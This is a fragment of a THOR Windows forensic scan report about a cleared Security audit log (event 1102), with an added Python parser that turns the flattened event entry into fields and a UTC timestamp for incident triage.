SubjectUserSid: S-1-5-18 SubjectUserName: SYSTEM SubjectDomainName: NT AUTHORITY SubjectLogonId: 999 ClientProcessId: 2040 ClientProcessStartKey: 4785074604081773 Provider_Name: Microsoft-Windows-Eventlog Provider_Guid: {fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148} EventID: 1102 Version: 1 Level: 4 Task: 104 Opcode: 0 Keywords: 4620693217682128896 TimeCreated_SystemTime: 1.7253582649479408e+09 EventRecordID: 143904 Execution_ProcessID: 2160 Execution_ThreadID: 8740 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
50
|
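The ENTRY line of Notice 36 flattens the 1102 event into `Key: value` pairs and prints the creation time as a float epoch in scientific notation, which is awkward to read and to pivot on. The following Python parser is an added example, not part of the report or of THOR: it splits the ENTRY string back into fields (values such as `NT AUTHORITY` contain spaces, so it splits on the next `Key:` token rather than on whitespace), converts `TimeCreated_SystemTime` to a UTC timestamp, and pulls out the facts an analyst needs to pivot from an audit-log-cleared event. The ENTRY text is copied verbatim from the notice; the treatment of logon ID 999 (0x3E7) as the well-known SYSTEM logon session is general Windows knowledge, not something the report states.

```python
import re
from datetime import datetime, timezone

# ENTRY field of Notice 36, copied verbatim from the report.
ENTRY_1102 = (
    "SubjectUserSid: S-1-5-18 SubjectUserName: SYSTEM SubjectDomainName: NT AUTHORITY "
    "SubjectLogonId: 999 ClientProcessId: 2040 ClientProcessStartKey: 4785074604081773 "
    "Provider_Name: Microsoft-Windows-Eventlog Provider_Guid: {fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148} "
    "EventID: 1102 Version: 1 Level: 4 Task: 104 Opcode: 0 Keywords: 4620693217682128896 "
    "TimeCreated_SystemTime: 1.7253582649479408e+09 EventRecordID: 143904 "
    "Execution_ProcessID: 2160 Execution_ThreadID: 8740 Channel: Security "
    "Computer: pc01243.MercuryLark.corp"
)

# Each value runs lazily up to the next " Key: " token or the end of the line,
# so multi-word values like "NT AUTHORITY" survive intact.
_PAIR = re.compile(r"(\w+): (.*?)(?= \w+: |$)")

SYSTEM_LOGON_ID = "999"  # 0x3E7, the well-known SYSTEM logon session


def parse_entry(entry: str) -> dict[str, str]:
    """Split THOR's flattened 'Key: value Key: value' ENTRY string into a dict."""
    return {k: v for k, v in _PAIR.findall(entry)}


def event_time_iso(fields: dict[str, str]) -> str:
    """TimeCreated_SystemTime is a float epoch in seconds; render it as UTC,
    truncated to whole seconds so it lines up with the report's EVENT_TIME."""
    epoch = int(float(fields["TimeCreated_SystemTime"]))
    return datetime.fromtimestamp(epoch, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def summarise_1102(entry: str) -> dict[str, object]:
    """Pivot points for a Security 1102 (audit log cleared) event."""
    f = parse_entry(entry)
    if f.get("EventID") != "1102" or f.get("Channel") != "Security":
        raise ValueError("not a Security 1102 event")
    return {
        "computer": f["Computer"],
        "cleared_at_utc": event_time_iso(f),
        "subject": f"{f['SubjectDomainName']}\\{f['SubjectUserName']} ({f['SubjectUserSid']})",
        "subject_is_system_session": f["SubjectLogonId"] == SYSTEM_LOGON_ID,
        # The Eventlog service logs the clear; the requesting process is the
        # one identified by ClientProcessId / ClientProcessStartKey.
        "client_pid": f["ClientProcessId"],
        "client_process_start_key": f["ClientProcessStartKey"],
        "record_id": f["EventRecordID"],
    }


if __name__ == "__main__":
    for k, v in summarise_1102(ENTRY_1102).items():
        print(f"{k:<26} {v}")
```

The converted timestamp (2024-09-03T10:11:04Z) agrees with the notice's EVENT_TIME line, so that field is rendered in UTC here. Because the subject is the SYSTEM session rather than an interactive user, the account name does not identify who cleared the log; the pivot is ClientProcessId 2040 (with its start key) in process-creation telemetry around that time on pc01243, and the scan's own later finding on the same day, the LocalAccountTokenFilterPolicy key in Notice 35 modified at 12:20:55, belongs on the same timeline.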
Notice 37
|
Sep 10 13:13:10 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Report
MESSAGE:
Thor Scan finished
END_TIME:
Tue Sep 10 13:13:10 2024
ALERTS:
3
WARNINGS:
57
NOTICES:
36
ERRORS:
0
|